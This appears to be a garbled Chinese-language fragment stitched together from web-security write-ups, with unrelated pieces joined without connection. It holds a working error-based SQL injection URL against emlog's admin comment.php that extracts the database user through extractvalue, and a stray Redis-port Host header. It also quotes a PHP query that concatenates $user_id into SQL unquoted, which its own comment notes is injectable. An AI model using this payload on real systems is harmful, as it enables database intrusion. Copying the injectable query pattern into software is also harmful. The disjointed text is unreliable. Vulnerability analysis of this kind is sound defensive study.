3.1 区域剖析缺点：针对特定用处的后门较难检测,施行难度较大。 /emlog/admin/comment.php?action=delbyip&token=abac6e12c2abe9b29797b64481ef6ed4&ip=127.0.0.1′and (extractvalue(1,concat(0x7e,(select user()),0x7e)))# 注入时得进行编码处理才干成功，当然各位师傅的骚操作比我多。 Host: localhost:6379}

$sql = 'select ua.*,u.address_id as adds_id from ' . $this->pre . 'user_address as ua left join '. $this->pre . 'users as u on ua.address_id =u.address_id'. ' where ua.user_id = ' . $user_id . ' order by ua.address_id limit ' . $start . ', ' . $num; //很明显没有单引号,直接拼接进去造成了注入。